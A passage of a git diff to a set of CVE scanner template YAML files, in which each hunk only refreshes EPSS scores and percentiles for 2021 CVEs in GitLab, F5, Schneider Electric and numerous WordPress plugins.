CWE-94 - epss-score: 0.97419 - epss-percentile: 0.9989 + epss-score: 0.97295 + epss-percentile: 0.99816 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 2e91a4bb49..87c854d35a 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -22,8 +22,8 @@ info: cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 - epss-score: 0.12503 - epss-percentile: 0.94709 + epss-score: 0.13161 + epss-percentile: 0.94905 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 4a583abb61..ed79db4a29 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 - epss-score: 0.9745 - epss-percentile: 0.9992 + epss-score: 0.97323 + epss-percentile: 0.99835 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 11c414883a..e59c2270f6 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-22707 cwe-id: CWE-798 epss-score: 0.3812 - epss-percentile: 0.96713 + epss-percentile: 0.96756 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index f0e819e358..f33a959a91 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-22873 cwe-id: CWE-601 - epss-score: 0.00867 - epss-percentile: 0.80246 + epss-score: 0.00922 + epss-percentile: 0.81142 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 68fb332a78..b8e033edb0 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-22911 cwe-id: CWE-75,NVD-CWE-Other epss-score: 0.94897 - epss-percentile: 0.98981 + epss-percentile: 0.99032 cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 48afbdf66a..52d637dc2c 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22986 cwe-id: CWE-918 - epss-score: 0.97452 - epss-percentile: 0.99923 + epss-score: 0.9745 + epss-percentile: 0.99937 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 896861a941..533d6798a8 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-23241 cwe-id: CWE-22 - epss-score: 0.00321 - epss-percentile: 0.66807 + epss-score: 0.00365 + epss-percentile: 0.6923 cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 8da2779bdb..baf8a973b1 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.93112 - epss-percentile: 0.98681 + epss-score: 0.91749 + epss-percentile: 0.98578 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 6fe33982e4..016fd734c3 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 epss-score: 0.02392 - epss-percentile: 0.88487 + epss-percentile: 0.8864 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 311285082e..d506cad5ce 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24150 cwe-id: CWE-918 - epss-score: 0.02513 - epss-percentile: 0.88746 + epss-score: 0.03142 + epss-percentile: 0.89971 cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 66915fe945..0ccc3eb81b 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 - epss-score: 0.95167 - epss-percentile: 0.99034 + epss-score: 0.94549 + epss-percentile: 0.98968 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f330c0f405..9224682818 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24165 cwe-id: CWE-601 epss-score: 0.00116 - epss-percentile: 0.44596 + epss-percentile: 0.44984 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 5e659da917..70b35e42a2 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.54871 + epss-percentile: 0.55294 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index fa5198b5b3..0b2ab3285a 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24176 cwe-id: CWE-79 epss-score: 0.00136 - epss-percentile: 0.48282 + epss-percentile: 0.48629 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 476ba29200..ab652ffdff 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24210 cwe-id: CWE-601 epss-score: 0.00116 - epss-percentile: 0.44596 + epss-percentile: 0.44984 cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index b237332eb0..36bcf11b3f 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.00369 - epss-percentile: 0.69091 + epss-percentile: 0.69401 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index f8a58238a6..3802759784 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24226 cwe-id: CWE-200 epss-score: 0.03501 - epss-percentile: 0.90323 + epss-percentile: 0.90437 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index e48d39a4a2..0a17081074 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24227 cwe-id: CWE-200 epss-score: 0.03493 - epss-percentile: 0.90307 + epss-percentile: 0.90429 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 02e42fcaf7..ce54f3183f 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24235 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 8eaca4cb3c..b9d8e26b33 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -19,7 +19,7 @@ info: cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.14539 - epss-percentile: 0.95043 + epss-percentile: 0.95117 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index c1241ceb60..66188a04a2 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24237 cwe-id: CWE-79 - epss-score: 0.00284 - epss-percentile: 0.64615 + epss-score: 0.00374 + epss-percentile: 0.69586 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index a1ce3a566d..ec136ecf75 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24239 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44596 + epss-percentile: 0.44984 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index d9810e8d46..2d807c223e 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24245 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54153 + epss-percentile: 0.5458 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index a5c60f4bc9..a56b2a1e0c 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24274 cwe-id: CWE-79 epss-score: 0.00147 - epss-percentile: 0.50047 + epss-percentile: 0.50416 cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 5859613a95..e454d1dd78 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24275 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54153 + epss-percentile: 0.5458 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 226854055d..64f51173ed 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54153 + epss-percentile: 0.5458 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 842ae5ba1b..3261cc64d8 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24278 cwe-id: CWE-863 - epss-score: 0.07444 - epss-percentile: 0.9325 + epss-score: 0.07978 + epss-percentile: 0.93532 cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index c26b8abaf6..08b6744d38 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24284 cwe-id: CWE-434 epss-score: 0.96885 - epss-percentile: 0.99579 + epss-percentile: 0.99598 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index d9d99e9036..772300e7f3 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24285 cwe-id: CWE-89 - epss-score: 0.12049 - epss-percentile: 0.94624 + epss-score: 0.14174 + epss-percentile: 0.95066 cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 737f6bdc1a..4ed3bd5ce7 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54153 + epss-percentile: 0.5458 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 113674866d..97872f7e63 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24288 cwe-id: CWE-601 epss-score: 0.0015 - epss-percentile: 0.50525 + epss-percentile: 0.50893 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 02aa67a1a6..190692f4bb 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24291 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.35153 + epss-percentile: 0.35518 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 4068a35d34..6d9542810a 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24298 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index eff25ca295..2c4617b71f 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24300 cwe-id: CWE-79 epss-score: 0.00302 - epss-percentile: 0.65712 + epss-percentile: 0.6606 cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 322261952e..30c0ff4042 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24316 cwe-id: CWE-79 epss-score: 0.00246 - epss-percentile: 0.61827 + epss-percentile: 0.62245 cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 381ff3bfae..e9b4d815d9 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24320 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index a087310d9c..7e48f020d9 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24335 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52284 + epss-percentile: 0.52672 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 5acce16868..7c43da289f 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 - epss-score: 0.02665 - epss-percentile: 0.89061 + epss-score: 0.0287 + epss-percentile: 0.89566 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1ff5552100..8d33bc2c5f 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24342 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40864 + epss-percentile: 0.41167 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index ad79aa05bd..47d061b0a1 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24347 cwe-id: CWE-178 epss-score: 0.96951 - epss-percentile: 0.99611 + epss-percentile: 0.99628 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index d118a8e04d..10899acba2 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49646 + epss-percentile: 0.50014 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 55358d010a..1f1c393623 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00255 - epss-percentile: 0.62645 + epss-percentile: 0.63055 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 08591d9593..808908fe08 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24364 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40864 + epss-percentile: 0.41167 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 9d4649c4b3..96d5912493 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24370 cwe-id: CWE-434 - epss-score: 0.06587 - epss-percentile: 0.9286 + epss-score: 0.07731 + epss-percentile: 0.93438 cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 81f3eed5fa..aedeec503e 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49646 + epss-percentile: 0.50014 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 187413d81f..b01d9c0ff6 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24389 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51613 + epss-percentile: 0.51997 cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 13e4224a21..0043a268ac 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24406 cwe-id: CWE-601 epss-score: 0.0015 - epss-percentile: 0.50525 + epss-percentile: 0.50893 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index f6146e8edd..4697e70f83 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24407 cwe-id: CWE-79 epss-score: 0.00161 - epss-percentile: 0.52061 + epss-percentile: 0.52432 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 5761488ed3..4ace5e9918 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24409 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.55477 + epss-percentile: 0.55974 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 56ba97a03f..2ee36f1382 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.48875 + epss-percentile: 0.49242 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 7362d34711..0018315fd1 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40466 + epss-percentile: 0.4078 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 712b9d1556..64608a64dd 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40466 + epss-percentile: 0.4078 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 5abf4d473b..6f2ea964c9 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24472 cwe-id: CWE-918 epss-score: 0.02619 - epss-percentile: 0.88968 + epss-percentile: 0.89109 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 2769ad2dad..6962dc76ee 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24488 cwe-id: CWE-79 epss-score: 0.00302 - epss-percentile: 0.65712 + epss-percentile: 0.6606 cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index afad38054a..7cbcde307d 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 67f2bc1d76..afab63249b 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24498 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.55477 + 